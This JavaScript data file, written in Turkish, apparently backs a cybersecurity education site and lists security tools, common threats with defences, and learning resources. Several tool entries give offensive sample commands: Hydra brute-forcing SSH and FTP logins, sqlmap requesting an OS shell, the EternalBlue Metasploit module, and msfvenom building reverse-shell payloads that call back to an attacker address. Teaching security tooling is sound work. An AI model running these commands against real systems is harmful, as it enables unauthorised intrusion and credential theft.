// data.js - Merkezi veri havuzu
const toolsData = [
    { id: "wireshark", name: "Wireshark", icon: "<img src='media/wireshark-logo.svg' style='width:32px;height:32px;'>", category: "Analiz", desc: "Ağ trafiğini yakalayıp detaylı analiz eder.", extra: "Kablosuz ağlar için ideal.", longDesc: "Wireshark, dünyanın en popüler ağ protokol analizörüdür. Gerçek zamanlı yakalama, derin paket inceleme ve 2000'den fazla protokol desteği sunar.", usage: "sudo apt install wireshark", example: "tshark -i eth0 -f 'tcp port 80'" },
    { id: "nmap", name: "Nmap", icon: "<img src='media/nmap-logo.svg' style='width:32px;height:32px;'>", category: "Tarama", desc: "Ağ keşfi ve güvenlik taraması.", extra: "Script engine ile zafiyet taraması.", longDesc: "Nmap (Network Mapper), ağ keşfi ve güvenlik denetimi için açık kaynaklı bir araçtır. Hızlı port tarama, işletim sistemi tespiti ve NSE scriptleri ile gelişmiş taramalar yapar.", usage: "nmap -sV -p 1-1000 192.168.1.1", example: "nmap --script vuln target.com" },
    { id: "metasploit", name: "Metasploit", icon: "<img src='media/metasploit-framework-logo.svg' style='width:32px;height:32px;'>", category: "Sızma", desc: "Penetrasyon testi framework'ü.", extra: "600+ exploit modülü.", longDesc: "Metasploit Framework, güvenlik açıklarını test etmek ve sömürmek için kullanılan en kapsamlı araçtır. Payload oluşturma, exploit geliştirme ve post-exploitation işlemleri için idealdir.", usage: "msfconsole", example: "use exploit/windows/smb/ms17_010_eternalblue" },
    { id: "burp", name: "Burp Suite", icon: "<img src='media/burpsuite-logo.svg' style='width:32px;height:32px;'>", category: "Web", desc: "Web uygulama güvenlik testleri.", extra: "OWASP Top 10 testleri.", longDesc: "Burp Suite, web uygulama güvenlik testleri için endüstri standardı bir proxy aracıdır. Intruder, Scanner, Repeater gibi modüllerle kapsamlı test imkanı.", usage: "java -jar burp.jar", example: "Proxy -> Intercept -> Request modify" },
    { id: "john", name: "John the Ripper", icon: "<img src='media/john-logo.svg' style='width:32px;height:32px;'>", category: "Parola", desc: "Parola kırma aracı.", extra: "GPU destekli brute-force.", longDesc: "John the Ripper, hızlı parola kırma aracıdır. Hash türlerini otomatik algılar ve sözlük/brute-force saldırıları yapar.", usage: "john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt", example: "john --format=nt hash.txt" },
    // Kali araçları (20+)
    { id: "aircrack", name: "Aircrack-ng", icon: "<img src='media/aircrack-ng-logo.svg' style='width:32px;height:32px;'>", category: "Kablosuz", desc: "Wi-Fi ağ güvenlik testi (WEP/WPA kırma).", extra: "Kali Linux'ta ön yüklüdür.", longDesc: "Aircrack-ng, kablosuz ağların güvenliğini test etmek için kullanılan en popüler araç setidir. WEP, WPA/WPA2-PSK kırma ve paket yakalama yapar.", usage: "airmon-ng start wlan0", example: "airodump-ng wlan0mon" },
    { id: "hydra", name: "Hydra", icon: "<img src='media/hydra-logo.svg' style='width:32px;height:32px;'>", category: "Parola", desc: "Çevrimiçi parola kırma aracı (SSH, FTP, HTTP).", extra: "Hızlı brute-force.", longDesc: "THC Hydra, ağ hizmetlerine karşı çok hızlı bir brute-force saldırı aracıdır. 50'den fazla protokolü destekler.", usage: "hydra -l admin -P passlist.txt ssh://192.168.1.1", example: "hydra -L users.txt -P pass.txt ftp://10.0.0.1" },
    { id: "sqlmap", name: "Sqlmap", icon: "<img src='media/sqlmap-logo.svg' style='width:32px;height:32px;'>", category: "Web", desc: "Otomatik SQL injection tespit ve sömürü.", extra: "Veritabanı dump alma.", longDesc: "Sqlmap, SQL injection açıklarını otomatik olarak tespit edip sömüren en gelişmiş araçtır. Veritabanı şeması çıkarma, dosya okuma/yazma yapabilir.", usage: "sqlmap -u 'http://site.com/page?id=1' --dbs", example: "sqlmap -r request.txt --os-shell" },
    { id: "nikto", name: "Nikto", icon: "<img src='media/nikto-logo.svg' style='width:32px;height:32px;'>", category: "Web", desc: "Web sunucusu zafiyet tarayıcısı.", extra: "2000+ test.", longDesc: "Nikto, web sunucularındaki potansiyel tehlikeleri, eski sürümleri ve güvenlik açıklarını tarayan bir araçtır.", usage: "nikto -h http://target.com", example: "nikto -h https://example.com -ssl -port 443" },
    { id: "beef", name: "BeEF", icon: "<img src='media/beef-xss-logo.svg' style='width:32px;height:32px;'>", category: "Web", desc: "Browser Exploitation Framework", extra: "Tarayıcı tabanlı saldırılar.", longDesc: "BeEF, web tarayıcılarındaki güvenlik açıklarını sömürmek için kullanılır. XSS, clickjacking vb. testler.", usage: "beef-xss", example: "Hooked browser -> command modules" },
    { id: "gobuster", name: "Gobuster", icon: "<img src='media/gobuster-logo.svg' style='width:32px;height:32px;'>", category: "Web", desc: "Dizin/dosya brute-force aracı.", extra: "DNS alt alan adı keşfi.", longDesc: "Gobuster, web sunucularında gizli dizin ve dosyaları brute-force yöntemiyle bulan bir araçtır.", usage: "gobuster dir -u http://site.com -w wordlist.txt", example: "gobuster dns -d example.com -w subdomains.txt" },
    { id: "hashcat", name: "Hashcat", icon: "<img src='media/hashcat-logo.svg' style='width:32px;height:32px;'>", category: "Parola", desc: "Dünyanın en hızlı parola kırıcısı.", extra: "GPU destekli.", longDesc: "Hashcat, GPU'ları kullanarak çok yüksek hızda hash kıran bir araçtır.", usage: "hashcat -m 0 hash.txt rockyou.txt", example: "hashcat -m 1000 ntlm_hash.txt -a 3 ?d?d?d?d" },
    { id: "enum4linux", name: "Enum4linux", icon: "<img src='media/enum4linux-logo.svg' style='width:32px;height:32px;'>", category: "Sızma", desc: "Windows/SMB bilgi toplama.", extra: "Kali'de varsayılan.", longDesc: "Enum4linux, Windows ve SMB paylaşımlarından bilgi toplamak için kullanılan bir araçtır.", usage: "enum4linux -U 192.168.1.10", example: "enum4linux -S target" },
    { id: "searchsploit", name: "Searchsploit", icon: "<img src='media/exploitdb-logo.svg' style='width:32px;height:32px;'>", category: "Zafiyet", desc: "Exploit-DB'de arama.", extra: "Metasploit ile entegre.", longDesc: "Searchsploit, Exploit-DB veritabanında açıklara ve exploit'lere hızlıca arama yapmanızı sağlar.", usage: "searchsploit apache 2.4", example: "searchsploit -m 12345" },
    { id: "msfvenom", name: "Msfvenom", icon: "<img src='media/metasploit-framework-logo.svg' style='width:32px;height:32px;'>", category: "Sızma", desc: "Metasploit payload üretici.", extra: "Çeşitli formatlarda zararlı yazılım.", longDesc: "Msfvenom, Metasploit Framework'ün payload oluşturma ve kodlama aracıdır.", usage: "msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe", example: "msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf" },
    { id: "recon-ng", name: "Recon-ng", icon: "<img src='media/recon-ng-logo.svg' style='width:32px;height:32px;'>", category: "İstihbarat", desc: "Web tabanlı keşif aracı.", extra: "Modüler yapı.", longDesc: "Recon-ng, açık kaynak istihbaratı (OSINT) toplamak için geliştirilmiş bir framework'tür.", usage: "recon-ng", example: "workspace create example; market install all" },
    { id: "theharvester", name: "theHarvester", icon: "<img src='media/theharvester-logo.svg' style='width:32px;height:32px;'>", category: "İstihbarat", desc: "E-posta, alt alan adı toplama.", extra: "OSINT aracı.", longDesc: "theHarvester, Google, Bing, LinkedIn gibi kaynaklardan e-posta ve alt alan adları toplar.", usage: "theHarvester -d example.com -b google", example: "theHarvester -d target.com -l 500 -b all" }
];

const threatsData = [
    { id: "ransomware", name: "Ransomware", icon: "fa-skull", severity: "Kritik", desc: "Dosyaları şifreleyerek fidye ister.", extra: "Yedekleme en etkili savunma.", longDesc: "Ransomware, kurbanın dosyalarını şifreleyen ve şifreyi çözmek için fidye talep eden kötü amaçlı yazılımdır.", solution: "Düzenli yedekleme, güncel antivirüs, e-posta eklerine dikkat." },
    { id: "phishing", name: "Phishing", icon: "fa-fish", severity: "Çok Yaygın", desc: "Sahte e-posta ile bilgi çalma.", extra: "Sosyal mühendislik.", longDesc: "Phishing, kullanıcıları sahte web sitelerine veya e-postalara yönlendirerek kimlik bilgilerini çalma saldırısıdır.", solution: "MFA, bağlantıları kontrol et, şüpheli e-postaları bildir." },
    { id: "mitm", name: "Man-in-the-Middle", icon: "fa-user-secret", severity: "Yüksek", desc: "İletişimi gizlice dinleme/değiştirme.", extra: "Halka açık Wi-Fi tehlikesi.", longDesc: "MITM saldırısında saldırgan, iki taraf arasındaki iletişimi ele geçirir ve verileri dinler/değiştirir.", solution: "VPN kullan, HTTPS zorunlu, sertifika doğrulama." },
    { id: "ddos", name: "DDoS", icon: "fa-server", severity: "Yüksek", desc: "Aşırı trafik ile servis çökertme.", extra: "Botnet'ler kullanılır.", longDesc: "Dağıtık Hizmet Engelleme saldırısı, birden çok kaynaktan hedefe yoğun trafik göndererek hizmeti kullanılamaz hale getirir.", solution: "Rate limiting, CDN, DDoS koruma hizmetleri." },
    { id: "zeroday", name: "Zero-Day", icon: "fa-clock", severity: "Kritik", desc: "Yaması yapılmamış açık.", extra: "Tespiti zordur.", longDesc: "Zero-Day açığı, yazılım satıcısının henüz bilmediği veya yamasını yayınlamadığı güvenlik açığıdır.", solution: "Davranış tabanlı koruma, minimum yüzey, güncellemeleri takip." },
    { id: "sqli", name: "SQL Injection", icon: "fa-database", severity: "Tehlikeli", desc: "Veritabanına zararlı SQL enjeksiyonu.", extra: "Parametrik sorgular engeller.", longDesc: "SQL Injection, web uygulamasındaki girdi alanlarına SQL kodu enjekte ederek veritabanına yetkisiz erişim sağlama yöntemidir.", solution: "Parametrik sorgular, ORM kullanımı, girdi temizleme." },
    { id: "rootkit", name: "Rootkit", icon: "fa-robot", severity: "Gelişmiş", desc: "Sisteme derinlemesine yerleşir.", extra: "Genelde format şarttır.", longDesc: "Rootkit, işletim sisteminin çekirdek seviyesine yerleşen ve varlığını gizleyen kötü amaçlı yazılımdır.", solution: "Güvenilir kaynaklardan yazılım, davranış analizi, format." },
    { id: "credstuff", name: "Credential Stuffing", icon: "fa-user-lock", severity: "Yüksek", desc: "Çalınan kimlik bilgilerini dener.", extra: "Çoklu faktör ile korunun.", longDesc: "Saldırgan, daha önce sızdırılmış kullanıcı adı/şifre çiftlerini başka sitelerde dener.", solution: "MFA, parola yöneticileri, şifre sızdı kontrolü." }
];

const resourcesData = [
    { id: "owasp", name: "OWASP Top 10", icon: "fa-list", desc: "Web güvenliğindeki en kritik 10 risk.", extra: "Mutlaka okunmalı.", longDesc: "OWASP Top 10, web uygulamalarındaki en yaygın güvenlik risklerini sıralayan bir rapordur. Geliştiriciler ve güvenlik uzmanları için temel kaynaktır.", url: "https://owasp.org/www-project-top-ten/" },
    { id: "kali", name: "Kali Linux", icon: "<img src='media/Kali-dragon-icon.svg.png' style='width:32px;height:32px;'>", desc: "600+ güvenlik aracı içeren dağıtım.", extra: "Penetrasyon testleri için.", longDesc: "Kali Linux, Debian tabanlı, ileri seviye penetrasyon testi ve güvenlik denetimi için özel olarak hazırlanmış bir işletim sistemidir.", url: "https://www.kali.org/" },
    { id: "cve", name: "CVE Details", icon: "fa-database", desc: "Bilinen güvenlik açıkları veritabanı.", extra: "Zafiyet araştırması.", longDesc: "CVE Details, Common Vulnerabilities and Exposures (CVE) listesinin detaylı bir veritabanıdır.", url: "https://www.cvedetails.com/" },
    { id: "sans", name: "SANS Institute", icon: "fa-chalkboard-user", desc: "Dünyaca ünlü eğitimler.", extra: "Beyaz kağıtlar ve webinarlar.", longDesc: "SANS Institute, siber güvenlik eğitimi ve sertifikasyonunda dünya lideridir. Ücretsiz webinarlar ve beyaz kağıtlar sunar.", url: "https://www.sans.org/" },
    { id: "hibp", name: "Have I Been Pwned", icon: "fa-envelope", desc: "E-posta ihlal kontrolü.", extra: "Şifre kontrolü.", longDesc: "Kullanıcıların e-posta adreslerinin veri ihlallerinde olup olmadığını kontrol eden ücretsiz bir hizmettir.", url: "https://haveibeenpwned.com/" },
    { id: "tryhackme", name: "TryHackMe", icon: "<img src='media/tryhackme.svg' style='width:32px;height:32px;'>", desc: "Siber güvenlik öğrenmek için interaktif lab.", extra: "Başlangıç seviyesi için.", longDesc: "TryHackMe, oyunlaştırılmış siber güvenlik eğitimleri ve sanal makineler sunan bir platformdur.", url: "https://tryhackme.com/" }
];